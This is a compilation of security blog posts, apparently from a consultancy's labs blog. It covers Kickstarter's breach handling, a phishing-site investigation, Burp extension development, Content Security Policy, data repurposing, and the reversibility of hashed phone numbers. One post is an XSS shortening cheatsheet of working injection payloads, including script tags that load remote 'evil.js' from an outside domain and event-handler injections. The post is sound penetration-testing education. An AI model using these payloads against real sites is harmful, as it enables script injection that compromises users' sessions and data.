What Kickstarter Did Right

Only a few details have emerged about the recent breach at Kickstarter, but it appears that this one will be a case study in doing things right both before and after the breach.

What Kickstarter has done right:

  • Timely notification
  • Clear messaging
  • Limited sensitive data retention
  • Proper password handling

Timely notification

The hours and days after a breach is discovered are incredibly hectic, and there will be powerful voices both attempting to delay public announcement and attempting to rush it. When users’ information may be at risk beyond the immediate breach, organizations should strive to make an announcement as soon as it will do more good than harm. An initial public announcement doesn’t have to have all the answers, it just needs to be able to give users an idea of how they are affected, and what they can do about it. While it may be tempting to wait for full details, an organization that shows transparency in the early stages of a developing story is going to have more credibility as it goes on.

Clear messaging

Kickstarter explained in clear terms what was and was not affected, and gave straightforward actions for users to follow as a result. The logging and access control groundwork for making these strong, clear statements at the time of a breach needs to be laid far in advance and thoroughly tested. Live penetration testing exercises with detailed post mortems can help companies decide if their systems will be able to capture this critical data.

Limited sensitive data retention

One of the first questions in any breach is “what did they get?”, and data handling policies in place before a breach are going to have a huge impact on the answer. Thinking far in advance about how we would like to be able to answer that question can be a driver for getting those policies in place. Kickstarter reported that they do not store full credit card numbers, a choice that is certainly saving them some headaches right now. Not all businesses have quite that luxury, but thinking in general about how to reduce the retention of sensitive data that’s not actively used can reduce costs in protecting it and chances of exposure over the long term.

Proper password handling (mostly)

Kickstarter appears to have done a pretty good job in handling user passwords, though not perfect. Password reuse across different websites continues to be one of the most significant threats to users, and a breach like this can often lead to ripple effects against users if attackers are able to obtain account passwords.

In order to protect against this, user passwords should always be stored in a hashed form, a representation that allows a server to verify that a correct password has been provided without ever actually storing the plaintext password. Kickstarter reported that their “passwords were uniquely salted and digested with SHA-1 multiple times. More recent passwords are hashed with bcrypt.” When reading breach reports, the level of detail shared by the organization is often telling and these details show that Kickstarter did their homework beforehand.

A strong password hashing scheme must protect against the two main approaches that attackers can use: hash cracking, and rainbow tables. The details of these approaches have been well-covered elsewhere, so we can focus on what Kickstarter used to make their users’ hashes more resistant to these attacks.

To resist hash cracking, defenders want to massively increase the amount of work an attacker has to do to check each possible password. The problem with hash algorithms like SHA1 and MD5 is that they are too efficient; they were designed to be completed in as few CPU cycles as possible. We want the opposite from a password hash function, so that it is reasonable to check a few possible passwords in normal use but computationally ridiculous to try out large numbers of possible passwords during cracking. Kickstarter indicated that they used “multiple” iterations of the SHA1 hash, which multiplies the attacker effort required for each guess (so 5 iterations of hashing means 5 times more effort). Ideally we like to see a hashing attempt take at least 100 ms, which is a trivial delay during a legitimate login but makes large scale hash cracking essentially infeasible. Unfortunately, SHA1 is so efficient that it would take more than 100,000 iterations to raise the effort to that level. While Kickstarter probably didn’t get to that level (it’s safe to assume they would have said so if they did), their use of multiple iterations of SHA1 is an improvement over many practices we see.

To resist rainbow tables, it is important to use a long, random, unique salt for each password. Salting passwords removes the ability of attackers to simply look up hashes in a precomputed rainbow tables. Using a random, unique salt on each password also means that an attacker has to perform cracking on each password individually; even if two users have an identical password, it would be impossible to tell from the hashes. There’s no word yet on the length of the salt, but Kickstarter appears to have gotten the random and unique parts right.

Finally, Kickstarter’s move to bcrypt for more recent passwords is particularly encouraging. Bcrypt is a modern key derivation function specifically designed for storing password representations. It builds in the idea of strong unique salts and a scalable work factor, so that defenders can easily dial up the amount computation required to try out a hash as computers get faster. Bcrypt and similar functions such as PBKDF2 and the newer scrypt (which adds memory requirements) are purpose built make it easy to get password handling right; they should be the go-to approach for all new development, and a high-priority change for any codebases still using MD5 or SHA1.

Gutting a Phish

In the news lately there have been countless examples of phishing attacks becoming more sophisticated, but it’s important to remember that entire “industry” is a bell curve: the most dedicated attackers are upping their game, but advancements in tooling and automation are also letting many less sophisticated players get started even more easily. Put another way, spamming and phishing are coexisting happily as both massive multinational business organizations and smaller cottage-industry efforts.

One such enterprising but misguided individual made the mistake of sending a typically blatant phishing email to one of our Neohapsis mailing lists, and someone forwarded it along to me for a laugh.

Initial Phish Email

The phishing email, as it appeared in a mailbox

As silly and evident as this is, one thing I’m constantly astounded by is how the proportion of people who will click never quite drops to zero. Our work on social engineering assessments bears out this real world example: with a large enough sample set, you’ll always hook at least one. In fact, a paper out of Microsoft Research suggests that, for scammers, this sort of painfully blatant opening is actually an intentional tool: it acts as a filter that only the most gullible will pass.

Given the weak effort put into the email, I was curious to see if the scam got any better if someone actually clicked through. To be honest, I was pleasantly surprised.

Phish Site

The phishing site: a combination of legitimate Apple code and images and a form added by the attacker

The site is dressed up as a reasonable approximation of an official Apple site. In fact, a look at the source shows that there are two things going on here: some HTML/CSS set dressing and template code that is copied directly from the legitimate Apple site, and the phishing form itself which is a reusable template form created by one of the phishers.

Naturally, I was curious where data went once the form was submitted. I filled in some bogus data and submitted it (the phishing form helpfully pointed out any missing data; there is certainly an audacity in being asked to check the format of the credit card number that’s about to be stolen). The data POST went back to another page on the same server, then quickly forwarded me on to the legitimate iTunes site.

Submit and Forward Burp -For Blog

This is another standard technique: if a “login” appears to work because the victim was already logged in, the victim will often simply proceed with what they were doing without questioning why the login was prompted in the first place. During social engineering exercises at Neohapsis, we have seen participants repeatedly log into a cloned attack site, with mounting frustration, as they wonder why the legitimate site isn’t showing them the bait they logged in for.

Back to this phishing site: my application security tester spider senses were tingling, so I felt that I had to see what our phisher was doing with the data being submitted. To find out, I replayed the submit request with various types of invalid data, strings that should cause errors depending on how the data was being parsed or stored. Not a single test string produced any errors or different behavior. This could be an indication that any parsing and processing is being done carefully and correctly, but the far more likely case is that they’re simply doing no processing and dumping it all straight out as plain text.

Interesting… if harvested data is just being simply dumped to disk, where exactly is it going? Burp indicates that the data is being POSTed to a harvester script at Snd/Snd.php. I wonder what else is in that directory?

directory listing

Under the hood of the phishing site, the loot stash is clearly visible

That results.txt file looks mighty promising… and it is.

result.txt

The format of the result.txt file

These are the raw results dumped from victims by the harvester script (Snd.php). The top entry is dummy data that I submitted, and when I checked it, the file was entirely filled with the various dummy submissions I had done before. It’s pretty clear from the results that I was the first person to actually click through and submit data to the phish site; actually pretty fortunate, because if a victim did enter legitimate information, the attacker would have to sort it out from a few hundred bogus submissions. Any day that we can make life harder for the the bad guys is a good day.

So, the data collection is dead simple, but I’d still like to know a bit more about the scam and the phishers if possible. There’s not a lot to go on, but the tag at the top of each entry seems unique. It’s the sort of thing we’re used to seeing when hackers deface a website and leave a tag to publicize the work:

------------+| $ o H a B  Dz and a m i r TN |+------------

Googling some variations turned up Google cache of a forum post that’s definitely related to the phishing site above; it’s either the same guy, or someone else using the same tool.

AppleFullz Forum post

A post in a carder forum, offering to sell data in the same format as generated by the phishing site above

A criminal using the name AppleFullz is selling complete information dumps of login details and credit card numbers plus CVV numbers (called “fulls” in carder forums) captured in the exact format that the Apple phish used, and even provides a sample of his wares (Insult to injury for the victim: not only was his information stolen, but it’s being given away as the credit card fraud equivalent of the taster trays at the grocery store). This carder is asking for $10 for one person’s information, but is willing to give bulk discounts: $30 for 5 accounts (This is actually a discount over the sorts of prices normally seen on carder forums; Krebs recently reported that Target cards were selling for $20-$100 per card. I read this as an implicit acknowledgement by our seller that this data is much “dirtier” and that the seller is expecting buyers to mine it for legitimate data). The tools being used here are a combination of some pre-existing scraps of  PHP code widely used in other spam and scam campaigns (the section labeled “|INFO|VBV|”), and a separate section added specifically to target Apple ID’s.

Of particular interest is that the carder provided a Bitcoin address. For criminals, Bitcoin has the advantage of anonymity but the disadvantage that transactions are public. This means that we can actually look up how much money has flowed into that particular Bitcoin address.

blockchain

Ill-gotten gains: the Bitcoin blockchain records transfers into the account used for selling stolen Apple Id’s and credit card numbers.

From November 17, when the forum posting went up, until December 4th, when I investigated this phishing attempt, he has received Bitcoin transfers totaling 0.81815987 BTC, which is around $744.53 (based on the BTC value on 12/4). According to his price sheet, that translates to a sale of between 74 and 124 records: not bad for a month of terribly unsophisticated phishing.

Within a few hours of investigating the initial phishing site, it had been removed. The actual server where the phish site was hosted was a legitimate domain that had been compromised; perhaps the phisher noticed the volume of bogus traffic and decided that the jig was up for that particular phish, or the system administrator got tipped off by the unusual traffic and investigated. Either way the phish site is offline, so that’s another small victory.

Burp Extensions in Python & Pentesting Custom Web Services

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kind of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues.  Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

  1. Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java
  2. Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Event though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)
  3. In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.ConfigureJython
  4. Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)
  5. The official Burp docs include one other important step:

    Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

    java.lang.OutOfMemoryError: PermGen space

    You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

    java -XX:MaxPermSize=1G -jar burp.jar

  6. At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.
    # These are java classes, being imported using python syntax (Jython magic)
    from burp import IBurpExtender
    from burp import IHttpListener
    
    # These are plain old python modules, from the standard library
    # (or from the "Folder for loading modules" in Burp>Extender>Options)
    from datetime import datetime
    
    class BurpExtender(IBurpExtender, IHttpListener):
    
        def registerExtenderCallbacks(self, callbacks):
            self._callbacks = callbacks
            self._helpers = callbacks.getHelpers()
            callbacks.setExtensionName("Burp Plugin Python Demo")
            callbacks.registerHttpListener(self)
            return
    
        def processHttpMessage(self, toolFlag, messageIsRequest, currentRequest):
            # only process requests
            if not messageIsRequest:
                return
            
            requestInfo = self._helpers.analyzeRequest(currentRequest)
            timestamp = datetime.now()
            print "Intercepting message at:", timestamp.isoformat()
            
            headers = requestInfo.getHeaders()
            newHeaders = list(headers) #it's a Java arraylist; get a python list
            newHeaders.append("Timestamp: " + timestamp.isoformat())
            
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]
            bodyStr = self._helpers.bytesToString(bodyBytes)
            newMsgBody = bodyStr + timestamp.isoformat()newMessage = self._helpers.buildHttpMessage(newHeaders, newMsgBody)
            
            print "Sending modified message:"
            print "----------------------------------------------"
            print self._helpers.bytesToString(newMessage)
            print "----------------------------------------------\n\n"
            
            currentRequest.setRequest(newMessage)
            return
    
  7. To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.
  8. Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.
A request has been processed and modified by the extension. Since Burp doesn't currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension's tab.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes a an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

jython_interpreter

This shell was originally intended to work with the classes and objects defined jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

jython_shell1

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services . SoapUI Pro even includes a variety of web-service specific payloads for security testing.

SoapUI

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducability for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a "proper" WSDL or service description by telling SoapUI it's a REST service.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are a tons of tools out there, including official Burp examples, burpextensions.com, and findable on github. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

Defeating Cross-site Scripting with Content Security Policy

If you have been following Neohapsis’ @helloarbit or @coffeetocode on Twitter, you have probably seen us tweeting quite a bit about Content Security Policy.  Content Security Policy is an HTTP header that allows you, the developer or security engineer, to define where web applications can or can not load content from.   By defining a strict Content Security policy, the deveopers of web applications can completely almost completely mitigate cross-site scripting and other attacks.

CSP functions by allowing a web application to declare the source of where it expects to load scripts, allowing the client to detect and block malicious scripts injected into the application by an attacker.

Another way to think about content-security policy is as a source whitelist. Typically when an end user makes a request for a web page, the browser trusts output that the server is delivering. CSP however limits this trust model by sending Content-Security-Policy header that allows the application to specify a whitelist of trusted (expected) sources. When the browser receives this header, it will only render or execute resources from those sources.

In the event that an attacker does have the ability to inject malicious content that is reflected back against the user, the script will not match the source whitelist, and the script will not be executed.

Traditional mechanisms to mitigate cross-site scripting are to HTML encode or escape output that is reflected back to a user as well as perform rigorous input validation. However due to the complexity of encoding and validation, cross-site scripting may crop up in your website.  Think of CSP as your insurance policy in the event something malicious sneaks through your input validation and output encoding strategies.

Although we at Neohapsis Labs have been researching Content Security Policy for a while, we found that it’s a complicated technology that has plenty of intricacies.  After realizing that many users may run into the same issues and confusion we did, we decided to launch cspplayground.com to help educate developers and security engineers on how to use CSP as well as a way to validate your own complex policies.

CSP Playground allows you to see example code and practices that are likely to break when applying CSP policies.  You can toggle custom policies and watch in real-time how they affect the playground web application.  We also provide some sample approaches on how to modify your code so that it will play nicely with CSP.  After you have had time to tinker around, you can use the CSP Validator to build out your own CSP policy and ensure that it is in compliance with the CSP 1.1 specification.

The best way to learn CSP is by experimenting with it.  We  at Neohapsis Labs have put together cspplayground.com site just for those reasons and suggest you check out the site to learn more about it.

Repurposing Data…or, “You’re Going To Do WHAT?”

By Patrick Madden

Boston.com published an AP story that Google is implementing an opt-in beta test to include users’ email in search results. In other words, when a user is logged in at Gmail, performing a plain old Google search will turn up emails in addition to web pages. Privacy concerns have been flagged and noted, and the existence of matching emails will be presented using a collapsed control off to the side of the main results. But will this really do the job? Google searches are shoulder-surfed all the time, so simply disclosing even the existence of a matching email can potentially put people in hot water depending on the search terms.

Google’s beta is another instance in a disturbing trend to repurpose user data in ways that weren’t intended or anticipated when the users provided their data. As the AP article reminds us, Google had previously ventured into this territory with Google Buzz before running into legal challenges. Facebook regularly and unashamedly repurposed ancient postings, many of them ephemeral “status” updates, as users’ timelines that could be easily browsed, though it could be debated that this makes it more clear that the old posts do still exist.

In my AppSec work I regularly find “Insufficient Authorization” in sites and products I assess. These findings are generally relative to the app owner’s perspective and answer the question, “Can my user perform activities or access data in ways I don’t want?” When I look at repurposed user data, though, I see an exactly analogous situation but in the opposite direction…from the user perspective, the question becomes, “Can my service provider use my data in ways I don’t want?”

[The answer, of course, is in the terms of service wherein the providers claim rights to use and disseminate data provided to them, even if they don’t claim ownership of the actual data. Apparently, then, there’s no basis to complain about any of this, and Google, Facebook, and others will simply do what they want. That’s slightly pessimistic, but it’s not that far from what we’ve seen so far.]

When a finding of “Insufficient Authorization” appears to be the result of intended functionality, application owners are asked to review their business requirements versus the vulnerability, identify alternative means of meeting the business requirements, or reconsider the functionality altogether. On the other hand, ordinary end users are terrible at doing all of these, if they even care in the first place. Who can state their personal “business requirements” for social media and other free services, who has gone to the trouble of identifying the risks inherent in sharing personal data with third parties (and quantifying the risks? Pfft!), and who’s willing to reconsider the use of a service they’ve invested themselves in substantially, even though no payment was involved?

Repurposing of user data happens because a provider thinks they’ve found a way to make more money, and because one-sided terms of service make few concessions allowing users to control how their own data gets used. At the same time, that repurposing should never increase user risk exposure by default, at least not in my own personal utopia. Maybe we should all be looking for and flagging “Insufficient Authorization” findings from the user’s perspective. And if the Gmail feature goes live in production with no option to disable it, perhaps I can use separate email and search providers to segregate functionality and mitigate risk.

XSS Shortening Cheatsheet

By Ben Toews

In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting a simple <b>hello</b> into their page, but it leaves much more of an impression of severity when you can at least make an alert box.

My go to line for testing XSS is always <script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because 123123 is easy to grep for and will rarely show up as a false positive (a quick Google search returns only 9 million pages containing the string 123123). It is also nice because it doesn’t require apostrophes.

This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your <script> tag, some more well known than others. Here are a few:

  • If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g. <script src='//btoe.ws/xss.js'></script>
  • If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if  you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg. <script src='evil.js'></script>
  • If you are including a JavaScript file from another domain, there is no reason why its extension must be .js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg. <script src='http://btoe.ws'>
  • If you are using IE you don’t need to close the <script> tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g. <script src='http://btoe.ws/evil.js'>
  • You don’t need quotes around your src attribute. Eg. <script src=http://btoe.ws/evil.js></script>

In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is <script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your malicious code on another domain. I own btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is <script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of <script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.

Time to give up? I think not.

Another option is to forgo the <script> tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers. onclick and onkeyup are even pretty short. Here are a couple more tricks:

  • You can make up your own tags! E.g. <x onclick="alert(1)">foo</x>
  • If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g. <x onclick='alert(1)'>.
  • You don’t need to wrap your code in quotes. Eg. <b onclick=alert(1)>foo</b>
  • If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as function a(){alert(1)} you can simply do <b onclick='a()'>foo</b>
  • While onclick and onkeyup are short when used with <b> or a custom tag, they aren’t going to fire without user interaction. The onload event of the <body> tag on the other hand will. I think that having duplicate <body> tags might not work on all browsers, though.  E.g. <body onload='alert(1)'>

Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us <b onclick=a()>. Similar to the unrealistically good <script> tag example from above, this comes in at 14 characters. A more realistic and useful line might be <b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.

This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the <b> tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject <. This would likely break the page, but it would at least be noticable and would prove your point.

This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.

If you want to see some of these in action, copy the following into a file and open it in your your browser or go to http://mastahyeti.com/vps/shrtxss.html.

Edit: albinowax points out that onblur is shorter than onclick or onkeyup.


<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>

<!– XSS Injected here –>
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!– End XSS Injection –>

<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value=’try typing in here’>
</form>
</body>
</html>

PS: I did some Googling before writing this. Thanks to those at sla.ckers.org and at gnarlysec.

Pass the iOS Privacy Salt – Hashing Does NOT Guarantee Privacy.

By Kate Pearce, Neohapsis & Neolabs

There has been a lot of concern and online chatter about iPhone/mobile applications and the private data that some send to various parties. Starting with the discovery of Path sending your entire address book to their servers, it has since also been revealed that other applications do the same thing. The other offenders include Facebook, Twitter, Instagram, Foursquare, Foodspotting, Yelp, and Gowalla. This corresponds nicely with some research I have been doing into device ID leakage on mobile devices, where I have seen the same leakages, excuses, and techniques applied and abused as those discussed around the address book leakages.

I have observed a few posts discussing the issues proposing solutions. These solutions range from requiring iOS to request permission for address book access (as it does for location) and advising developers to hash sensitive data that they send through and compare hashes server side.

The first idea is a very good one, I see few reasons a device geolocation is less sensitive than its address book. The second one as given by is only partial advice however, and if taken as it is given in Martin May’s post, or Matt Gemmel’s arguments;  it will not solve the privacy problems on its own. This is because 1. anonymised data isn’t anonymous, and 2. no matter what hashing algorithm you use, if the input material is sufficiently constrained you can compute, or precompute all possible values.

Martin May’s two characteristics of a hash [link] :

  • Identical inputs will yield the same hash
  • It is virtually impossible to deduce the original input from a hash if a strong hashing algorithm is used.

This is because, of these two characteristics of a hash the privacy implications of first are not fully discussed, and the second is incorrect as stated.

 Hashing will not solve the privacy concerns because:

  • Hashing Data does not Guarantee Privacy (When the same data is input)
  • Hashing Data does not Guarantee Secrecy (When the input values are constrained)

The reasons not discussed for this are centered on the fact that real world input is constrained, not infinite. Telephone numbers are an extreme case of this, as I will discuss later.

A quick primer on hashing

Hashing is a destructive, theoretically one-way process where some data is taken and put through an algorithm to produce some output that is a shadow of the input. Like a shadow, the same output is always produced by the same input, but not the other way around. (Same car, same shadow).

A very simple example of a hashing function is the modulus (or remainder). For instance the output from 3 mod 2 is the remainder when 3 is divided by 2, or 1. The percent sign is commonly used in programming languages to denote this operation, so similarly

                1 % 3 is 1,             2 % 3 is 2              3 % 3 is 0              4 % 3 is 1              5 % 3 is 2       etc

If you take some input, you get the same output every time from the same hashing function. The reason the hashing process is one way is because it intentionally discards some data about the original. This results in what are called collisions, and we can see some in our earlier example using mod 3, 1 and 4 give the same hash, as do 2 and 5. The example given will cause collisions approximately one time in 1, however modern strong hashing functions are a great deal more complex than modulo 3. Even the “very broken” MD5 has collisions occur only one time in every 2^24 or 1 in ~17 000 000.

A key point is that, with a hashing algorithm for any output there are theoretically an infinite number of inputs that can give it and thus it is a one-way, irreversible, process.

A second key point is that any input gives the same output every time. So, by checking if the hashes of two items are the same you can be pretty sure they are from the same source material.

Cooking Some Phone Number Hash(es)

(All calculations are approximate, if I’m not out by two orders of magnitude then…)

Phone numbers conform to a rather well known format, or set of formats. A modern GPU can run about 20 million hashes per second (2*10^7), or 1.7  trillion (1.7 *10 11) per day. So, how does this fit with possible phone numbers?

A pretty standard phone number is made up of 1-3 digits for a country code, 3 local code, and 7 numbers, with perhaps 4 for the extension.

So, we have the following range of numbers:

0000000000000-0000 to 9999999999999-0000

Or, 10^13 possible numbers… About 60 days work to compute all possible values (and a LOT of storage space…)

If we now represent it in a few other forms that may occur to programmers…

+001 (234) 567-8910, 0012345678910, 001-234-5678910, 0012345678910(US), 001(234)5678910

We have maybe 10-20 times that, or several year’s calculations…

But, real world phone numbers don’t fill all possible values. For instance, take a US phone number. It is also made up of the country code, 3 for the local code , and 7 numbers, with perhaps 4 for the extension. But:

  • The country code is known:
  • The area code is only about 35% used since only 350 values are in use
  • The 7 digit codes are not completely full (let’s guess 80%)
  • Most numbers do not use extensions (let’s say 5% use them

Now, we only have 350 * (10 000 000 *.8) * 1.05 or 2.94 billion combinations (2.94*10^9). That is only a little over two minutes on a modern GPU. Even allowing for different representations of numbers you could store that in a few of gigabytes of RAM for instant lookup, or recalculate every time and take longer. This is what is called a time space tradeoff, the space of the memory or the time to recalculate.

Anyway, the two takeaways for our discussion here regarding privacy are:

1. Every unique output value probably corresponds to a unique input value, so this hashing anonymisation still has privacy concerns.
Since possible phone numbers are significantly fewer than the collision chance of even a broken hashing algorithm there is probably little chance of collisions.

2. Phone numbers can be reverse computed from raw hashes alone
Because of the known constraints of input values It is possible to either brute force reverse values, or to build a reasonable sized rainbow table on a modern system.

Hashing Does NOT Guarantee Privacy

Anonymising data by removing specific user identifying information but leaving in unique identifiers does not work to assuage privacy concerns. This is because often clues are in the data, or in linkages between the data. AOL learned this the hard way when they released “anonymised” search data.

Furthermore, the network effect can reveal a lot about you, how many people you connect to, and how many they connect to can be a powerful identifier of you. Not to mention predict a lot of things like your career area and salary point (since more connections tends to mean richer).

For a good discussion of some of the privacy issues related to hashes see Matt Gemmell’s post, Hashing for Privacy in social apps.

Mobile apps also often send the device hardware identifier (which cannot be changed or removed) to servers and advertising networks. And I have also observed the hash of this (or the WiFi MAC address) sent through. This hardly helps accomplish anything, as anyone who knows the device ID can hash it and look for that, and anyone who knows the hash can look for it, just as with the phone numbers. This hash is equally unique to my device, and unable to be changed.

Hashing Does not equal Secrecy

As discussed under “cooking some hash(es)” it is possible to work back from a hash to the input since we know some of the constraints operating upon phone numbers. Furthermore, even if we are not sure exactly how you are hashing data then we can simply put test data in and look for known hashes of it. If I know what 123456789 hashes to and I see it in the output, then I know how your app is hashing phone numbers.

The Full Solution to Privacy and Secrecy: Salt

